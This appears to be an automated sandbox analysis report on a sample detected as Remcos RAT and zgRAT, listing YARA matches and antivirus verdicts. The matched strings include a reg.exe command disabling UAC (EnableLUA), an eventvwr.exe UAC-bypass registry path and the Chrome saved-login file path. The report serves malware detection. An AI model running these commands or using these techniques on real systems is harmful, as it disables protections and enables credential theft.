28.0.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
0.2.kyFBQxVbsg.exe.4ba0000.4.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.kyFBQxVbsg.exe.4ba0000.4.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5b6a2:$s1: file:/// 0x5b5fe:$s2: {11111-22222-10009-11112} 0x5b632:$s3: {11111-22222-50001-00000} 0x58303:$s4: get_Module 0x5841f:$s5: Reverse 0x59b22:$s6: BlockCopy 0x5a1a4:$s7: ReadByte 0x5b6b6:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
26.0.InstallUtil.exe.400000.6.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.6.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.6.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
17.0.InstallUtil.exe.400000.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
17.0.InstallUtil.exe.400000.8.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.8.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
24.2.Qerdo.exe.5440000.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
24.2.Qerdo.exe.5440000.4.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5d4a2:$s1: file:/// 0x5d3fe:$s2: {11111-22222-10009-11112} 0x5d432:$s3: {11111-22222-50001-00000} 0x5a103:$s4: get_Module 0x5a21f:$s5: Reverse 0x5b922:$s6: BlockCopy 0x5bfa4:$s7: ReadByte 0x5d4b6:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
26.0.InstallUtil.exe.400000.4.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.4.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
26.0.InstallUtil.exe.400000.3.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.3.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.3.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.8.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.8.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.8.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
26.0.InstallUtil.exe.400000.3.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.3.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
19.2.Qerdo.exe.35cfb10.3.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
19.2.Qerdo.exe.35cfb10.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
19.2.Qerdo.exe.35cfb10.3.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
Click to see the 187 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe

Avira: detection malicious, Label: TR/Dropper.MSIL.Gen

Multi AV Scanner detection for submitted file

Source: kyFBQxVbsg.exe	Virustotal: Detection: 46%			Perma Link
Source: kyFBQxVbsg.exe	ReversingLabs: Detection: 57%

Yara detected Remcos RAT

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
